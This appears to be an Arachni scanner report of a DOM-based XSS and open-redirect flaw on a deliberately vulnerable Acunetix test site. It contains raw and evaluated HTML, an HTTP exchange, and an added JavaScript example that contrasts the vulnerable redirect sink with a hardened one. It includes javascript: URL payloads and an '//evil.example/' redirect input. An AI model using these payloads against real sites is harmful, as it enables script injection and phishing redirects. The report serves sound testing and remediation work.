_arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/post.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script><div class="fb-comments" data-num-posts="4" data-width="470" data-href="http://testhtml5.vulnweb.com/#/redir?url=javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//"></div> <script 
type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/controllers/controllers.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/services/itemsService.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://bxss.s3.amazonaws.com/ad.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script><iframe name="ads_ads_frame" src="http://ads.bxss.me/ad_server.php?zone_id=234&ad_client=723898932&u_h=1080&u_w=1920&pn=&ref=&url=http://testhtml5.vulnweb.com/#/redir?url=javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//&" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" frameborder="0" height="1" scrolling="no" width="1" style="background-color:#FFFFFF;"></iframe> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </body></html> |
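The browser-evaluated body above contains the sink Arachni reached: the `#/redir` route reads `window.location.hash`, cuts out everything after `?url=`, URL-decodes it and assigns the result to `window.location`, so a `javascript:` URL in the fragment executes without any request to the server (the fragment in the `data-href` attribute shows the exact payload). The following is an added example, not code from the Arachni report or from the testhtml5.vulnweb.com application: it models that extraction as a pure function, faithful to the original, beside a hardened replacement, so both can be run under Node without a browser. The site origin, the origin allowlist and the sample hashes are assumptions constructed for the example, not values the page states as policy.

```javascript
// Added example: not part of the Arachni report or of the testhtml5.vulnweb.com
// application. It models the redirect sink from the browser-evaluated body as
// pure functions (the hash is passed in instead of read from window.location)
// so the behaviour can be exercised under Node without a browser.
//
// Sink as it appears in the page:
//   var redirUrl = decodeURIComponent(
//       window.location.hash.slice(window.location.hash.indexOf("?url=") + 5));
//   if (redirUrl) window.location = redirUrl;
// Source: window.location.hash (attacker-controlled, never sent to the server).
// Sink:   assignment to window.location, which accepts javascript: URLs.

// Assumed deployment values for the hardened version (not from the page).
const SITE_ORIGIN = "http://testhtml5.vulnweb.com";
const ALLOWED_ORIGINS = new Set([SITE_ORIGIN, "https://twitter.com"]);
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

// Faithful model of the vulnerable extraction. Two defects are visible:
//  1. no scheme check, so "javascript:" and "data:" URLs reach the sink;
//  2. when "?url=" is absent, indexOf() is -1 and slice(4) yields an
//     arbitrary suffix of the hash, which is then used as a relative URL.
function vulnerableRedirectTarget(hash) {
  return decodeURIComponent(hash.slice(hash.indexOf("?url=") + 5));
}

// Hardened replacement: read the parameter with URLSearchParams, resolve it
// with the WHATWG URL parser (which lower-cases the scheme, strips leading
// whitespace and resolves protocol-relative "//host" forms against the site),
// then enforce a scheme allowlist and an origin allowlist. Returns the
// normalised href, or null when the redirect must not happen.
function safeRedirectTarget(hash, allowedOrigins = ALLOWED_ORIGINS) {
  const q = hash.indexOf("?");
  if (q === -1) return null;
  const raw = new URLSearchParams(hash.slice(q + 1)).get("url");
  if (!raw) return null;

  let target;
  try {
    target = new URL(raw, SITE_ORIGIN + "/");
  } catch (e) {
    return null; // unparsable input is dropped, not passed through
  }
  if (!ALLOWED_SCHEMES.has(target.protocol)) return null;
  if (!allowedOrigins.has(target.origin)) return null;
  return target.href;
}

// Constructed inputs: the first is the hash Arachni used (visible in the
// data-href attribute of the evaluated body); the others are common variants.
const SAMPLE_HASHES = [
  "#/redir?url=javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//",
  "#/redir?url=https://twitter.com/bradhoylman/status/991408461203279872",
  "#/redir?url=%2F%2Fevil.example%2F",
  "#/redir?url=JaVaScRiPt%3Aalert(1)",
  "#/popular",
];

// Runs every sample through both versions so the difference is visible.
function compare(hashes = SAMPLE_HASHES) {
  return hashes.map((hash) => ({
    hash,
    vulnerable: vulnerableRedirectTarget(hash),
    hardened: safeRedirectTarget(hash),
  }));
}

for (const row of compare()) {
  console.log(JSON.stringify(row));
}
```

The scheme check alone closes the DOM XSS; the origin allowlist is what turns the same sink from an open redirect into a closed one. Both checks run on the parsed `URL` object rather than on the raw string, so mixed-case schemes, leading whitespace and `//host` shorthand are normalised before they are compared.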
This is the original HTTP response body.
| <script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()":{"stop_at_first":false,"trace":true},"username":{"stop_at_first":true,"trace":false},"admin":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <!DOCTYPE html> <html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp"> <head> <meta charset="utf-8"> <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title> <meta name="viewport" 
content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content=""> <!-- Le styles --> <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet"> <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'> <link href="/static/css/style.css" rel="stylesheet"> <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico"> <style type="text/css"> body { padding-top: 60px; padding-bottom: 40px; } .sidebar-nav { padding: 9px 0; } @media (max-width: 980px) { /* Enable use of floated navbar text */ .navbar-text.pull-right { float: none; padding-left: 5px; padding-right: 5px; } } </style> </head> <body> <div class="navbar navbar-fixed-top"> <div class="navbar-inner"> <div class="container-fluid"> <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a> <p class="navbar-text pull-left"> Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>. 
</p> <p class="navbar-text pull-right"> Welcome <b>admin</b> | <a href='/logout'>Logout</a> </p> </div> </div> </div> <div class="container-fluid"> <div class="row-fluid"> <div class="span2"> <div class="well sidebar-nav"> <ul class="nav nav-list"> <li class="nav-header">Views</li> <li id="popularLi" class="active"><a href="#/popular">Popular</a></li> <li><a href="#/latest">Latest</a></li> <li><a href="#/carousel">Carousel</a></li> <li><a href="#/archive">Archive</a></li> <li class="nav-header">Website</li> <li><a href="#/about">About</a></li> <li><a href="#/contact">Contact</a></li> <li class="nav-header">Acunetix</li> <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li> <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li> <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li> <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li> </ul> </div><!--/.well --> </div><!--/span--> <div class="span10"> <div class="row-fluid"> <div ng-view></div> </div><!--/row--> </div><!--/span--> </div><!--/row--> <hr> <div class="row-fluid"> <div class="pull-left" style="font-size: xx-small;" id="refId"></div> </div> <div style="background-color:lightgray;width:100%;text-align:center;font-size:14px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). 
Links presented on this site have no affiliation to the site and are here only as samples.</p> </div> <footer> <p class="pull-left">© Acunetix Ltd. 2019</p> </footer> </div><!--/.fluid-container--> <!-- Modal --> <div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <form class="modal-body" action="/login" method="POST" id="loginForm"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Login</h3> </div> <div class="modal-body"> <div class="control-group"> <!-- Username --> <label class="control-label" for="username">Username</label> <div class="controls"> <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin"> </div> </div> <div class="control-group"> <!-- Password--> <label class="control-label" for="password">Password</label> <div class="controls"> <input type="password" id="password" name="password" placeholder="" class="input-xlarge"> </div> </div> <div class="control-group"> <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a> </div> </div> <div class="modal-footer"> <button class="btn btn-primary" id="loginFormSubmit">Login</button> <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button> </div> </form> </div> <!-- Le javascript ================================================== --> <!-- Placed at the end of the document so the pages load faster --> <script src="http://code.jquery.com/jquery-1.9.1.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"> // 
Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <!-- App libs --> <script src="/static/app/app.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/libs/sessvars.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/post.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script 
src="/static/app/controllers/controllers.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/services/itemsService.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://bxss.s3.amazonaws.com/ad.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </body> </html> |
Transitions describe, as a series of events, the steps required to restore the page to the state it had when the scanner processed it. In essence, each transition represents a user interaction.
| # | Time (s) | Event | Element | Options |
|---|---|---|---|---|
| 0 | 9.163898 | load | page | |
| 1 | 3.86217 | request | http://testhtml5.vulnweb.com/ | |
| 2 | 3.554117 | request | http://testhtml5.vulnweb.com/static/app/services/itemsService.js | |
| 3 | 0.30496 | request | http://testhtml5.vulnweb.com/ajax/popular?offset=0 | |
| 4 | 0.812222 | request | http://testhtml5.vulnweb.com/static/app/partials/itemsList.html | |
| 5 | 0.570796 | request | http://testhtml5.vulnweb.com/static/scr/default.png | |
Raw HTTP request used to retrieve the page.
GET / HTTP/1.1
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,*
Host: testhtml5.vulnweb.com
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Mon, 26 Jan 1970 06:56:47 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Content-Encoding: gzip
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;
/* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->
<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">
<head>
<meta charset="utf-8">
<title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="">
<!-- Le styles -->
<link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">
<link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
<link href="/static/css/style.css" rel="stylesheet">
<link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">
<style type="text/css">
body {
padding-top: 60px;
padding-bottom: 40px;
}
.sidebar-nav {
padding: 9px 0;
}
@media (max-width: 980px) {
/* Enable use of floated navbar text */
.navbar-text.pull-right {
float: none;
padding-left: 5px;
padding-right: 5px;
}
}
</style>
</head>
<body>
<div class="navbar navbar-fixed-top">
<div class="navbar-inner">
<div class="container-fluid">
<button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a>
<p class="navbar-text pull-left">
Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.
</p>
<p class="navbar-text pull-right">
<a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>
</p>
</div>
</div>
</div>
<div class="container-fluid">
<div class="row-fluid">
<div class="span2">
<div class="well sidebar-nav">
<ul class="nav nav-list">
<li class="nav-header">Views</li>
<li id="popularLi" class="active"><a href="#/popular">Popular</a></li>
<li><a href="#/latest">Latest</a></li>
<li><a href="#/carousel">Carousel</a></li>
<li><a href="#/archive">Archive</a></li>
<li class="nav-header">Website</li>
<li><a href="#/about">About</a></li>
<li><a href="#/contact">Contact</a></li>
<li class="nav-header">Acunetix</li>
<li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>
<li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>
<li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>
<li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>
</ul>
</div><!--/.well -->
</div><!--/span-->
<div class="span10">
<div class="row-fluid">
<div ng-view></div>
</div><!--/row-->
</div><!--/span-->
</div><!--/row-->
<hr>
<div class="row-fluid">
<div class="pull-left" style="font-size: xx-small;" id="refId"></div>
</div>
<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">
<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>
</div>
<footer>
<p class="pull-left">© Acunetix Ltd. 2019</p>
</footer>
</div><!--/.fluid-container-->
<!-- Modal -->
<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
<form class="modal-body" action="/login" method="POST" id="loginForm">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
<h3 id="myModalLabel">Login</h3>
</div>
<div class="modal-body">
<div class="control-group">
<!-- Username -->
<label class="control-label" for="username">Username</label>
<div class="controls">
<input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">
</div>
</div>
<div class="control-group">
<!-- Password-->
<label class="control-label" for="password">Password</label>
<div class="controls">
<input type="password" id="password" name="password" placeholder="" class="input-xlarge">
</div>
</div>
<div class="control-group">
<a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>
</div>
</div>
<div class="modal-footer">
<button class="btn btn-primary" id="loginFormSubmit">Login</button>
<button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>
</div>
</form>
</div>
<!-- Le javascript
================================================== -->
<!-- Placed at the end of the document so the pages load faster -->
<script src="http://code.jquery.com/jquery-1.9.1.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<!-- App libs -->
<script src="/static/app/app.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/libs/sessvars.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/post.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/controllers/controllers.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/services/itemsService.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://bxss.s3.amazonaws.com/ad.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</body>
</html>
This is the browser-evaluated body, as a result of the listed transitions.
| <html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp" class="ng-scope" data-arachni-id="1909442962"><head><script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script 
src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <meta charset="utf-8"> <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content=""> <!-- Le styles --> <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet"> <link href="http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic" rel="stylesheet" type="text/css"> <link href="/static/css/style.css" rel="stylesheet"> <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico"> <style type="text/css"> body { padding-top: 60px; padding-bottom: 40px; } .sidebar-nav { padding: 9px 0; } @media (max-width: 980px) { /* Enable use of floated navbar text */ .navbar-text.pull-right { float: none; padding-left: 5px; padding-right: 5px; } } </style> <style type="text/css">@charset "UTF-8";[ng\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak{display:none;}ng\:form{display:block;}</style></head> <body> <div class="navbar navbar-fixed-top"> <div class="navbar-inner"> <div class="container-fluid"> <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="brand" href="https://www.acunetix.com/" data-arachni-id="-59717636"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a> <p class="navbar-text pull-left"> Vulnerable 
HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/" data-arachni-id="-1395254329">Acunetix Web Vulnerability Scanner</a>. </p> <p class="navbar-text pull-right"> <a href="#myModal" role="button" class="btn" data-toggle="modal" data-arachni-id="73596745">Login</a> </p> </div> </div> </div> <div class="container-fluid"> <div class="row-fluid"> <div class="span2"> <div class="well sidebar-nav"> <ul class="nav nav-list"> <li class="nav-header">Views</li> <li id="popularLi" class="active"><a href="#/popular" data-arachni-id="1270713017">Popular</a></li> <li><a href="#/latest" data-arachni-id="-2026013785">Latest</a></li> <li><a href="#/carousel" data-arachni-id="67552640">Carousel</a></li> <li><a href="#/archive" data-arachni-id="916551842">Archive</a></li> <li class="nav-header">Website</li> <li><a href="#/about" data-arachni-id="63058797">About</a></li> <li><a href="#/contact" data-arachni-id="-1678787584">Contact</a></li> <li class="nav-header">Acunetix</li> <li><a target="_blank" href="http://www.acunetix.com/" data-arachni-id="-1405978501">Website</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/" data-arachni-id="166919624">HTML5 scanner</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/" data-arachni-id="-1519928118">HTML5 vuln help</a></li> <li><a target="_blank" href="http://www.acunetix.com/blog/" data-arachni-id="2073538">Blog</a></li> <li><a target="_blank" href="http://www.facebook.com/Acunetix" data-arachni-id="561774310">Facebook</a></li> <li><a target="_blank" href="http://www.twitter.com/acunetix/" data-arachni-id="748307027">Twitter</a></li> </ul> </div><!--/.well --> </div><!--/span--> <div class="span10"> <div class="row-fluid"> <div ng-view=""><script src="http://javascript.browser.arachni/polyfills.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script 
src="http://javascript.browser.arachni/taint_tracer.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script class="ng-scope"> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <div id="loader" class="ng-scope" style="display: none;"> Loading ... <i class="icon-spinner icon-spin icon-2x pull-left"></i> </div> <div data-ng-include="'/static/app/partials/itemsList.html'" class="ng-scope"><script src="http://javascript.browser.arachni/polyfills.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script class="ng-scope"> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <div class="row-fluid ng-scope"> <div class="pull-left"> <input type="text" placeholder="Filter results" ng-model="searchText" class="ng-pristine ng-valid" data-arachni-id="0"> </div> <div class="pull-right"> <div ng-show="filter==''">Page <span ng-bind-html-unsafe="pageStr" style="font-weight: bold;" class="ng-binding">0</span> </div> </div> <div class="pull-right"> <div ng-show="filter!=''" style="display: none;">Filtering 
